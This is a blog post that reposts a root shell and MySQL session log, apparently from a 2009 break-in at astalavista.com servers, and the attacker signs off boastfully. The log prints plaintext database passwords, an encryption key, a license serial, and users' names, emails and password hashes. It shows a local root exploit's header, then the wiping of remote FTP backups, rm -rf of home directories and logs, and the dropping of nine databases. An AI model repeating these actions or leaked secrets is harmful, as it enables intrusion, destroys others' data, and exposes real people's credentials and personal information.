-rw-r--r-- 1 root    root      24 Jun  4 09:38 .htadm_pwd

-rw-r--r-- 1 root    root      49 Jan  5  2006 .htpasswd_newhosting

-rw-r--r-- 1 root    root      51 Oct 11  2006 .htwebalizer_pwd



sh-3.2# cat hackercontest.config.inc.php

// Variabeln f?r Verbindung zur Datenbank //

$conxHost = 'localhost';                       // MySQL hostname

$conxUser = 'hackercontest';                                       // MySQL user

$conxPassword = 'K6m@7dUc';                    // MySQL password

$bfkey = 'cXvB3981';                                       // Encryption/Decryption Key for Blowfish

?>

sh-3.2# cat hosting.config.inc.php

// Variabeln f?r Verbindung zur Datenbank //

$conxHost = 'localhost';                       // MySQL hostname

$conxUser = 'hostinguser';                                 // MySQL user

$conxPassword = 'cXvB3981';                    // MySQL password

$bfkey = 'cXvB3981';                                       // Encryption/Decryption Key for Blowfish

?>



sh-3.2# cd ..

sh-3.2# cd com

sh-3.2# ls -la

total 141208

drwx--x--x 10 com  com       4096 Apr 28 12:40 .

drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..

drwx------  2 com  com       4096 Jun  4 04:04 backups

-rw-r--r--  1 root root   2419504 Sep 28  2007 backup.sql

drwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system

-rw-------  1 com  com      21880 Jun  2 08:07 .bash_history

-rw-r--r--  1 com  com         24 Sep 24  2007 .bash_logout

-rw-r--r--  1 com  com        176 Sep 24  2007 .bash_profile

-rw-r--r--  1 com  com        124 Sep 24  2007 .bashrc

drwx--x--x  3 com  com       4096 Jan 29  2008 domains

-rw-r--r--  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed

drwxrwx---  3 com  mail      4096 Jan  6 19:24 imap

-rw-------  1 com  com         69 Nov 18  2008 .lesshst

drwx------  2 com  com       4096 Sep 24  2007 mail

-rw-------  1 com  com      13970 Mar 28 21:42 .mysql_history

drwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp

lrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html

-rw-r-----  1 com  mail        34 Sep 24  2007 .shadow

drwx------  2 com  com       4096 Aug 26  2008 .ssh

-rwx------  1 com  com       8515 Feb 10  2008 t

-rw-rw-r--  1 com  com       6265 Feb 11  2008 t.c

drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp

-rw-rw-r--  1 com  com        617 May 20  2008 .toprc

-rw-rw-r--  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql

-rw-------  1 com  com      16629 Mar 28 21:46 .viminfo

-rw-rw-r--  1 com  com         51 Aug 25  2008 .vimrc



sh-3.2# head t.c

/*

 * jessica_biel_naked_in_my_bed.c

 *

 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.

 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.

 * Stejnak je to stare jak cyp a aj jakesyk rozbite.

 *

 * Linux vmsplice Local Root Exploit

 * By qaaz

 *



sh-3.2# cd /

sh-3.2# ls -la

total 360

drwxr-xr-x  25 root root   4096 Jun  3 02:43 .

drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..

-rw-------   1 root root  10240 Jun  3 02:39 aquota.group

-rw-------   1 root root  10240 Jun  3 02:39 aquota.user

-rw-r-----   1 root root    819 Jul 17  2008 astalavista.us.db

-rw-r--r--   1 root root      0 Jun  3 02:43 .autofsck

-rw-r--r--   1 root root      0 Sep 16  2007 .autorelabel

drwxr-xr-x   3 root root   4096 Dec 29  2007 backup

drwxr-xr-x   2 root root   4096 Jun  4 04:03 bin

drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot

drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev

drwxr-xr-x  84 root root  12288 Jun  4 03:16 etc

drwxr-xr-x  14 root root   4096 Mar 11 17:56 home

-rw-r--r--   1 root root  13387 Mar 20  2008 httpd.conf

drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib

drwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64

drwx------   2 root root  16384 Sep 11  2007 lost+found

drwxr-xr-x   2 root root   4096 Mar 11 17:56 media

drwxr-xr-x   2 root root      0 Jun  3 02:43 misc

drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt

-rw-r--r--   1 root root   5859 Feb  3  2008 mrtg.cfg

drwxr-xr-x   2 root root      0 Jun  3 02:43 net

drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt

dr-xr-xr-x 264 root root      0 Jun  3 02:42 proc

drwxr-x---  15 root root   4096 Jun  4 08:40 root

drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin

drwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux

drwxr-xr-x   2 root root   4096 Mar 11 17:56 srv

drwxr-xr-x  11 root root      0 Jun  3 02:42 sys

drwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp

drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr

drwxr-xr-x  26 root root   4096 Jun  4 03:16 var



sh-3.2# cd opt

sh-3.2# ls -la

total 20

drwxr-xr-x  3 root root 4096 Mar 11 17:56 .

drwxr-xr-x 25 root root 4096 Jun  3 02:43 ..

drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws



sh-3.2# cd lsws/

sh-3.2# ls -la

total 108

drwxr-xr-x 15 root   root    4096 Mar 20  2008 .

drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..

drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons

drwxr-xr-x 13 root   root    4096 May 29 15:10 admin

drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate

drwxr-xr-x  2 root   root    4096 May 29 15:10 bin

drwx------  4 apache apache  4096 Jun  3 02:43 conf

drwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT

drwxr-xr-x  2 root   root    4096 Sep 15  2008 docs

drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin

drwxr-xr-x  2 root   root    4096 Sep 15  2008 lib

-rw-r--r--  1 root   root    6959 May 29 15:10 LICENSE

-rw-r--r--  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP

-rw-r--r--  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL

-rw-r--r--  1 root   root    3208 May 29 15:10 LICENSE.PHP

drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs

drwxr-xr-x  2 root   root    4096 Mar 20  2008 php

drwx------  2 apache apache  4096 Mar 20  2008 phpbuild

drwxr-xr-x  3 root   root    4096 Mar 20  2008 share

-rw-r--r--  1 root   root       6 May 29 15:10 VERSION



sh-3.2# cd conf

sh-3.2# ls -la

total 48

drwx------  4 apache apache 4096 Jun  3 02:43 .

drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..

drwx------  2 apache apache 4096 Mar 20  2008 cert

-rw-r--r--  1 apache apache 6668 May 29 15:13 httpd_config.xml

-rw-------  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak

-rw-r--r--  1 root   apache    0 Jun  3 14:11 .last

-rw-------  1 apache apache  256 May 29 15:10 license.key

-rw-------  1 apache apache  256 Mar 21  2008 license.key.old

-rw-------  1 apache apache 3320 Mar 20  2008 mime.properties

-rw-------  1 apache apache   20 May 29 15:10 serial.no

drwx------  2 apache apache 4096 Mar 20  2008 templates



sh-3.2# cat serial.no

IbDl-oVsO-CKqL-wVRa



sh-3.2# mysql

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 286844

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+-----------------------+

| Database              |

+-----------------------+

| information_schema    |

| astanet_ads           |

| astanet_mailing_lists |

| astanet_mediawiki     |

| astanet_membersystem  |

| com_contrexx          |

| com_contrexx2         |

| com_contrexx2_live    |

| da_roundcube          |

| dolphin               |

| ideapool              |

| mysql                 |

| test                  |

| yourmaster            |

+-----------------------+

14 rows in set (0.00 sec)



mysql> use ideapool

Database changed

mysql> show tables;

+-----------------------------------+

| Tables_in_ideapool                |

+-----------------------------------+

| eventum_columns_to_display        |

| eventum_custom_field              |

| eventum_custom_field_option       |

| eventum_custom_filter             |

| eventum_customer_account_manager  |

| eventum_customer_note             |

| eventum_email_account             |

| eventum_email_draft               |

| eventum_email_draft_recipient     |

| eventum_email_response            |

| eventum_faq                       |

| eventum_faq_support_level         |

| eventum_group                     |

| eventum_history_type              |

| eventum_irc_notice                |

| eventum_issue                     |

| eventum_issue_association         |

| eventum_issue_attachment          |

| eventum_issue_attachment_file     |

| eventum_issue_checkin             |

| eventum_issue_custom_field        |

| eventum_issue_history             |

| eventum_issue_quarantine          |

| eventum_issue_requirement         |

| eventum_issue_user                |

| eventum_issue_user_replier        |

| eventum_link_filter               |

| eventum_mail_queue                |

| eventum_mail_queue_log            |

| eventum_news                      |

| eventum_note                      |

| eventum_phone_support             |

| eventum_project                   |

| eventum_project_category          |

| eventum_project_custom_field      |

| eventum_project_email_response    |

| eventum_project_field_display     |

| eventum_project_group             |

| eventum_project_link_filter       |

| eventum_project_news              |

| eventum_project_phone_category    |

| eventum_project_priority          |

| eventum_project_release           |

| eventum_project_round_robin       |

| eventum_project_status            |

| eventum_project_status_date       |

| eventum_project_user              |

| eventum_reminder_action           |

| eventum_reminder_action_list      |

| eventum_reminder_action_type      |

| eventum_reminder_field            |

| eventum_reminder_history          |

| eventum_reminder_level            |

| eventum_reminder_level_condition  |

| eventum_reminder_operator         |

| eventum_reminder_priority         |

| eventum_reminder_requirement      |

| eventum_reminder_triggered_action |

| eventum_resolution                |

| eventum_round_robin_user          |

| eventum_search_profile            |

| eventum_status                    |

| eventum_subscription              |

| eventum_subscription_type         |

| eventum_support_email             |

| eventum_support_email_body        |

| eventum_time_tracking             |

| eventum_time_tracking_category    |

| eventum_user                      |

+-----------------------------------+

69 rows in set (0.00 sec)



mysql> describe eventum_user;

+-------------------------+------------------+------+-----+---------------------+----------------+

| Field                   | Type             | Null | Key | Default             | Extra          |

+-------------------------+------------------+------+-----+---------------------+----------------+

| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |

| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |

| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |

| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |

| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |

| usr_status              | varchar(8)       | NO   |     | active              |                |

| usr_password            | varchar(32)      | NO   |     |                     |                |

| usr_full_name           | varchar(255)     | NO   |     |                     |                |

| usr_email               | varchar(255)     | NO   | UNI |                     |                |

| usr_preferences         | longtext         | YES  |     | NULL                |                |

| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |

| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |

| usr_lang                | varchar(5)       | YES  |     | NULL                |                |

+-------------------------+------------------+------+-----+---------------------+----------------+

13 rows in set (0.00 sec)



mysql> select usr_full_name,usr_email,usr_password from eventum_user;

+----------------------+-------------------------------+----------------------------------+

| usr_full_name        | usr_email                     | usr_password                     |

+----------------------+-------------------------------+----------------------------------+

| system               | system-account@example.com    | 14589714398751513457adf349173434 |

| Developer (Paulo)    | paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |

| Be1er0ph0r           | be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |

| Admin                | pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |

| ADMIN                | admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |

| USER                 | user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |

| Glafkos - (nowayout) | glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |

| Joao                 | joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |

| Pascal               | pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |

| commander            | commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |

| ishtus               | ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |

| sykadul              | sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |

| Zach McElroy         | admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |

| usb                  | usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |

| cyph3r               | cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |

+----------------------+-------------------------------+----------------------------------+

15 rows in set (0.00 sec)



mysql> exit

Bye





sh-3.2# ftp 212.254.194.163

Connected to 212.254.194.163.

220 BackupCOM_VW FTP server ready.

504 AUTH: security mechanism 'GSSAPI' not supported.

504 AUTH: security mechanism 'KERBEROS_V4' not supported.

KERBEROS_V4 rejected as an authentication type

Name (212.254.194.163:root): astalavista.com

331 Password required for astalavista.com.

Password:

230 User astalavista.com logged in.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls -la

227 Entering Passive Mode (212,254,194,163,2,188)

150 Opening BINARY mode data connection for 'file list'.

dr-x------   1 root users         4096 Jun  4 06:13 astalavista.com

226 Transfer complete.

ftp> cd astalavista.com

250 CWD command successful.

ftp> ls -la

227 Entering Passive Mode (212,254,194,163,2,189)

150 Opening BINARY mode data connection for 'file list'.

-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar

-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2

-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2

-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar

-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar

[snip]

226 Transfer complete.

ftp> mdelete *

ftp> ls -la

227 Entering Passive Mode (212,254,194,163,2,193)

150 Opening BINARY mode data connection for 'file list'.

226 Transfer complete.

ftp>



sh-3.2# cd /home

sh-3.2# ls -la

total 120

drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .

drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..

drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin

-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group

-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user

drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet

drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup

drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161

drwx--x--x 10 com     com      4096 Apr 28 12:40 com

drwxr-xr-x  2 root    root     4096 May 17  2007 ftp

drwx------  3 jon     jon      4096 Sep 21  2007 jon

drwx------  2 root    root    16384 Sep 11  2007 lost+found

drwxr-xr-x  2 root    root     4096 Sep 14  2007 my

drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata

drwx------  2 jon     jon      4096 Sep 15  2007 test

drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp



sh-3.2# rm -rf backup/

sh-3.2# rm -rf backup.14161/

sh-3.2# rm -rf ftp/

sh-3.2# rm -rf jon/

sh-3.2# rm -rf my/

sh-3.2# rm -rf mysqldata/

sh-3.2# rm -rf test/

sh-3.2# rm -rf tmp/

sh-3.2# cd ~

sh-3.2# rm -rf *

sh-3.2# rm -rf /var/log/

rm: cannot remove directory `/var/log//proftpd': Directory not empty

sh-3.2# rm -rf /home/*

sh-3.2# mysql

Welcome to the MySQL monitor.  Commands end with ; or \g.

Your MySQL connection id is 407156

Server version: 5.0.45-community-log MySQL Community Edition (GPL)



Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> show databases;

+-----------------------+

| Database              |

+-----------------------+

| information_schema    |

| astanet_ads           |

| astanet_mailing_lists |

| astanet_mediawiki     |

| astanet_membersystem  |

| com_contrexx          |

| com_contrexx2         |

| com_contrexx2_live    |

| da_roundcube          |

| dolphin               |

| ideapool              |

| mysql                 |

| test                  |

| yourmaster            |

+-----------------------+

14 rows in set (0.03 sec)



mysql> drop database astanet_membersystem;

droQuery OK, 46 rows affected (0.81 sec)



mysql> drop database com_contrexx;

Query OK, 211 rows affected (2.72 sec)



mysql> drop database com_contrexx2;

Query OK, 237 rows affected (2.23 sec)



mysql> drop database com_contrexx2_live;

Query OK, 227 rows affected (7.63 sec)



mysql> drop database ideapool;

Query OK, 69 rows affected (0.19 sec)



mysql> drop database yourmaster;

Query OK, 158 rows affected (0.55 sec)



mysql> drop database astanet_ads;

Query OK, 9 rows affected (0.11 sec)



mysql> drop database astanet_mailing_lists;

Query OK, 24 rows affected (1.47 sec)



mysql> drop database astanet_mediawiki;

Query OK, 31 rows affected (0.51 sec)



mysql> show databases;

+--------------------+

| Database           |

+--------------------+

| information_schema |

| da_roundcube       |

| dolphin            |

| mysql              |

| test               |

+--------------------+

5 rows in set (0.00 sec)



=============================================================





dalam kasus ini terbukti bahwa di atas langit masih ada langit 

yang perlu kita ingat hanya itu ..







REGARD 



ELV1N4

Labels: 



On 8/10/09 at 

9:17 PM






      




My Profile:

      
      


        


Biography:




short story:


      




      

      

      
      
[ Friends Link ]

      
      
[ chat with me ]


      

      

      

      

      




      












            		
      

    

      
      
[ archives ]

      

      
[ Notices ]


    

    

      

      


By title


ASTALAVISTA DI HAJAR HABIS - HABISAN



By month

2002.03

2002.12

2005.12

2008.11

2009.02

2009.03

2009.04

2009.05

2009.06

2009.07

2009.08

2009.09

2009.10

2009.11

2009.12

2010.01

2010.03


		
	





			
		
		
				

      
      





       

    


  

  





  

  

    


      
      
elv1n4 Themes  v2.0.0  © 2009 by elv1n4 


    

  

www[dot]elv1n4.anti-sec[dot]org